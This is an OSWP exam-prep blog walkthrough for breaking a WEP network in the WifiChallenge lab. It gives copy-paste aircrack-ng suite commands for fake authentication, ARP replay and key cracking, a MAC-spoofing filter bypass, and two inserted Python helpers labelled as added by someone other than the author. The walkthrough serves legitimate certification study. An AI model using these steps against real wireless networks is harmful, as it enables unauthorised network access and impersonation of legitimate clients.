Practical study material OSWP Part 3: WEP Walkthrough
This article describes how to set up a lab environment with WifiChallenge Lab and step by step complete a penetration test of a WEP-encrypted wireless network, including identifying the target AP, capturing the handshake packets, cracking the WEP key with aircrack-ng and connecting to the target network to retrieve the proof.txt file, plus a trick for bypassing MAC address filtering. 2025-6-10 06:50:50 Author: infosecwriteups.com (view original)

Nol White Hat

Summary

This blog post is the third article in a series of three that will serve as preparation for the Offsec Wireless Professional (OSWP) exam. This one is a complete walkthrough of the WEP challenge delivered by WifiChallenge Lab. Parts 1 and 2 deal with WPA2-PSK and WPA2-MGT.

Disclaimer

This article is for informational and educational purposes only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The article does not contain any information or examples from the actual OSWP exam. It does provide a framework that you can use to your advantage. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.

Why this blog?

There are a number of very good articles on study materials that can be used to pass the OSWP exam. The most notable ones are the OSWP playbook (https://zeyadazima.com/notes/oswplaybook/) and the GitHub page of “The H4ck3r Dude” (https://github.com/TheH4ck3rDude/OSWP-Exam-Notes).

Based on the two articles mentioned above, I have created an easy walkthrough for going through the WEP (Wired Equivalent Privacy) scenario. WEP was the first attempt to secure wireless communications by encrypting data. This walkthrough contains easy ‘copy-pastables’. It is set up in such a way that you only need to change the values of the required variables. This reduces errors and is much more efficient.

We will use the challenges from the WifiChallenge Lab (https://lab.wifichallenge.com/). This particular article is about the WEP challenge.

Lab environment

This POC consists of just 1 machine: an attacker machine running the latest Docker installation of the WifiChallenge Lab version 2.1.

I will not explain how to install Docker on Kali Linux. You can use the following installation walkthrough: https://www.geeksforgeeks.org/techtips/how-to-install-docker-in-kali-linux/

Create the WifiChallenge Lab Docker environment and install additional tools

1. Open a command terminal and copy and paste the commands below:

cd /opt
sudo git clone https://github.com/r4ulcl/WiFiChallengeLab-docker
cd WiFiChallengeLab-docker
docker compose -f docker-compose.yml up

The required Docker containers should be up and running in about 5 minutes.

2. Check if all 4 WifiChallenge Lab Docker containers are running:

docker container ls

3. Check if Kali contains some new (virtual) Wifi interfaces:

iwconfig | grep wlan

Part 1: Enumerate Wifi networks and select the target WEP Access Point (AP) to attack

4. Kill processes that may cause problems with airmon-ng (such as NetworkManager). Copy and paste the command below and press enter:

sudo airmon-ng check kill

5. Set interface wlan0 in monitor mode.

sudo airmon-ng start wlan0

Notice that interface wlan0mon is enabled.

6. Check which APs are active on the 2.4 GHz band (WEP was never designed for the 5 GHz band).

sudo airodump-ng wlan0mon

Results:

We detected 1 potential AP configured with WEP. This AP transmits on channel 3 (see column ‘CH’).

7. Check the APs that are transmitting on channel 3 (press CTRL+C to stop the current monitor).

channel=3
sudo airodump-ng -c ${channel} wlan0mon

Note: In my OSWP exam it took a while before a station was connected. Tip: start the monitoring and take a 10 minute break.

We found one station associated with the WEP-based network ‘wifi-old’.

Results:

ESSID = wifi-old

BSSID = F0:9F:C2:71:22:11

Station = 3E:C8:44:0A:24:BA
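
The same enumeration as steps 6 and 7 can be done from the CSV file that airodump-ng writes when it is started with -w and --output-format csv (as in step 8). The Python script below is an added example, not code from the original article or from WifiChallenge Lab: it parses the two sections of that CSV (access points, then stations) and lists every AP whose Privacy column says WEP together with the stations associated with it, which is how a defender would inventory legacy WEP networks during a wireless audit of their own estate. The CSV text embedded in the script is constructed to mimic airodump-ng's layout; it reuses the BSSID, station and ESSID from this page and adds a made-up WPA2 network for contrast.

```python
# Added example (not from the original article): list WEP access points and
# their associated stations from an airodump-ng CSV file.
import csv
import io

# Constructed sample in airodump-ng's CSV layout: an AP section, a blank line,
# then a station section. Values mirror the page's lab plus a made-up WPA2 AP.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
F0:9F:C2:71:22:11, 2025-06-10 06:50:50, 2025-06-10 06:55:12,  3,  54, WEP , WEP, OPN, -40,  120,  1540,   0.  0.  0.  0,   8, wifi-old,
F0:9F:C2:71:22:22, 2025-06-10 06:50:51, 2025-06-10 06:55:12,  6,  54, WPA2, CCMP, PSK, -45,  130,     0,   0.  0.  0.  0,  12, wifi-example,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
3E:C8:44:0A:24:BA, 2025-06-10 06:51:03, 2025-06-10 06:55:10, -50,  200, F0:9F:C2:71:22:11, wifi-old,
3E:C8:44:0A:24:CC, 2025-06-10 06:51:30, 2025-06-10 06:54:58, -60,   12, (not associated), wifi-example,
"""


def parse_airodump_csv(text):
    """Return (aps, stations): two lists of dicts keyed by the CSV header names.

    airodump-ng separates the AP table from the station table with a blank
    line and starts each table with its own header row, so the parser switches
    target list whenever it sees one of the two header rows.
    """
    aps, stations = [], []
    header, target = None, None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        row = [cell.strip() for cell in row]
        if not any(row):            # blank separator line
            header = None
            continue
        if row[0] == "BSSID":
            header, target = row, aps
            continue
        if row[0] == "Station MAC":
            header, target = row, stations
            continue
        if header is None:
            continue
        # zip() drops the trailing empty field (and any extra probed ESSIDs).
        target.append(dict(zip(header, row)))
    return aps, stations


def wep_networks(text):
    """List every AP still using WEP, with channel, IV count and its stations."""
    aps, stations = parse_airodump_csv(text)
    stations_by_bssid = {}
    for station in stations:
        stations_by_bssid.setdefault(station["BSSID"], []).append(station["Station MAC"])
    findings = []
    for ap in aps:
        if ap["Privacy"].upper().startswith("WEP"):
            findings.append({
                "essid": ap["ESSID"],
                "bssid": ap["BSSID"],
                "channel": int(ap["channel"]),
                "ivs": int(ap["# IV"]),
                "stations": stations_by_bssid.get(ap["BSSID"], []),
            })
    return findings


if __name__ == "__main__":
    # Replace SAMPLE_CSV with open("/tmp/dump-wep-01.csv").read() for a real capture.
    for finding in wep_networks(SAMPLE_CSV):
        print(f"WEP network {finding['essid']!r} ({finding['bssid']}) on channel "
              f"{finding['channel']}, {finding['ivs']} IVs, stations: {finding['stations']}")
```

Point the script at the dump-wep-01.csv file produced in step 8 (the path in the comment assumes the dumpfile variable from this page) and it prints the same ESSID, BSSID, channel and station that steps 6 and 7 read off the airodump-ng screen.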

Part 2: Capture handshake

In this part, we will capture an authentication handshake frame.

8. Open a new terminal tab. Start monitoring specifically on AP ‘wifi-old’ and dump the output in a capture file. Use copy and paste to execute the following command(s):

channel=3
bssid='F0:9F:C2:71:22:11'
essid='wifi-old'
dumpfile='/tmp/dump-wep'
client='3E:C8:44:0A:24:BA'

sudo rm /tmp/dump-wep-01*
sudo airodump-ng -c ${channel} -w ${dumpfile} --output-format pcap,csv --essid ${essid} --bssid ${bssid} wlan0mon

9. Open a second terminal tab. Perform a fake authentication against the AP with aireplay-ng (-1 3600: re-associate every 3600 seconds, -q 10: send a keep-alive every 10 seconds), so that the AP keeps accepting frames from our interface for the rest of the capture. Use copy and paste to execute the following command(s):

bssid='F0:9F:C2:71:22:11'
essid='wifi-old'
client='3E:C8:44:0A:24:BA'

sudo aireplay-ng -1 3600 -q 10 -a ${bssid} -e ${essid} -c ${client} wlan0mon

10. In the second terminal tab, generate ARP traffic in order to collect (duplicate) IVs.

bssid='F0:9F:C2:71:22:11'
essid='wifi-old'
client='3E:C8:44:0A:24:BA'

sudo aireplay-ng -3 -b ${bssid} -h ${client} wlan0mon

When you have captured at least 10,000 ARP requests, return to terminal 1.

11. Press CTRL+C to stop airodump.

12. Stop monitoring on wlan0mon:

sudo airmon-ng stop wlan0mon

Part 3: Crack handshake

We will use aircrack-ng to crack the authentication request that we captured.

13. Check if your dumpfile (including the authentication request) is present.

ls -l /tmp/dump-wep*

14. Use aircrack to crack the WEP authentication request. Use copy and paste to execute the following command(s):

dumpfile='/tmp/dump-wep'
sudo aircrack-ng ${dumpfile}-01.cap

Result:

We found the WEP key: ‘11:BB:33:CD:55’

Part 4: connect to the target network

In this final section, we will try to connect to the target network and download the proof.txt file.

15. Create a network configuration file. Use copy and paste to execute the following command(s) in the command terminal:

# create a WEP connection file
wep_key=11BB33CD55 #you need to remove the colons
essid='wifi-old'
cat << EOF > /tmp/wep.conf
network={
ssid="${essid}"
key_mgmt=NONE
wep_key0=${wep_key}
wep_tx_keyidx=0
}
EOF
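
Step 15 converts the key by hand (strip the colons) and writes the wpa_supplicant block with a heredoc. As an added example, not code from the article or from WifiChallenge Lab, the Python below does the same conversion with validation: it accepts the colon form that aircrack-ng prints, bare hex, or a 5/13-character ASCII key, rejects anything that is not a 40- or 104-bit WEP key, and renders the network block in wpa_supplicant's syntax (hex keys unquoted, ASCII keys in double quotes). The function names and the key_index parameter are my own; the file format is the one used in step 15.

```python
# Added example (not from the original article): build the wpa_supplicant
# network block for a WEP network from an ESSID and a key, with validation.
import re

WEP_HEX_LENGTHS = {10: 40, 26: 104}    # hex digits  -> key size in bits
WEP_ASCII_LENGTHS = {5: 40, 13: 104}   # ASCII chars -> key size in bits


def normalise_wep_key(key):
    """Return (value, is_hex) for a key given as 'AA:BB:..', 'AABB..' or ASCII.

    Colons, dashes and spaces are removed from hex keys, because aircrack-ng
    prints the key with colons while wpa_supplicant wants bare hex digits.
    Raises ValueError if the result is not a 40- or 104-bit WEP key.
    """
    stripped = re.sub(r"[:\- ]", "", key.strip())
    if re.fullmatch(r"[0-9A-Fa-f]+", stripped) and len(stripped) in WEP_HEX_LENGTHS:
        return stripped.upper(), True
    if len(key) in WEP_ASCII_LENGTHS and key.isprintable() and '"' not in key:
        return key, False
    raise ValueError(f"not a 40/104-bit WEP key: {key!r}")


def is_valid_wep_key(key):
    """True if normalise_wep_key() accepts the key."""
    try:
        normalise_wep_key(key)
        return True
    except ValueError:
        return False


def render_wep_network_block(essid, key, key_index=0):
    """Render the 'network={...}' block wpa_supplicant expects for a WEP network."""
    if not 0 <= key_index <= 3:
        raise ValueError("WEP key index must be between 0 and 3")
    value, is_hex = normalise_wep_key(key)
    # wpa_supplicant reads hex keys bare and ASCII keys inside double quotes.
    wep_value = value if is_hex else f'"{value}"'
    return (
        "network={\n"
        f'    ssid="{essid}"\n'
        "    key_mgmt=NONE\n"
        f"    wep_key{key_index}={wep_value}\n"
        f"    wep_tx_keyidx={key_index}\n"
        "}\n"
    )


if __name__ == "__main__":
    # Values from this page's lab; write the result to /tmp/wep.conf as in step 15.
    print(render_wep_network_block("wifi-old", "11:BB:33:CD:55"), end="")
```

Write the returned string to /tmp/wep.conf and start wpa_supplicant with it as in step 16; the validation step catches a key that lost or gained a character while being copied between terminals, which otherwise only shows up as a silent association failure.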

16. Next, use the network configuration file with the tool ‘wpa_supplicant’ and connect to the target WEP network. Copy and paste the following command:

sudo wpa_supplicant -i wlan0 -c /tmp/wep.conf

17. Get a valid IP address on interface wlan0.

sudo dhclient wlan0 -v

18. Download the proof.txt file. On the OSWP exam, the target IP address (for every scenario) is always 192.168.1.1. For illustration purposes only, we will try to download the proof.txt file from target 192.168.1.1.

target=192.168.1.1
curl http://${target}/proof.txt

Bonus: evade MAC address filtering

An access point can be configured with source MAC address filtering. This applies not only to WEP, but also to the WPA2-PSK/MGT scenario.

When MAC filtering is applied, connecting to the access point is not possible. Fortunately, this is easy to circumvent with ‘MAC spoofing’. With MAC spoofing it is possible to set up a connection using the MAC address of an existing client.

19. Configure interface wlan0 with an existing MAC address.

# Stop Interface
sudo ip link set wlan0 down

# Change the current MAC address with a MAC address of an existing client
client='3E:C8:44:0A:24:BA'
sudo macchanger -m ${client} wlan0

# Start Interface
sudo ip link set wlan0 up

# check interface MAC
ip link | grep wlan0 -A 1

20. Next, connect to the target network with the forged MAC address. Repeat steps 16 and 17.

References

· https://lab.wifichallenge.com

· https://www.offsec.com/courses/pen-210/

· https://zeyadazima.com/notes/oswplaybook

· https://github.com/TheH4ck3rDude/OSWP-Exam-Notes


Source: https://infosecwriteups.com/practical-study-material-oswp-part-3-wep-walkthrough-5dd2fe8ae176?source=rss----7b722bfd1b8d---4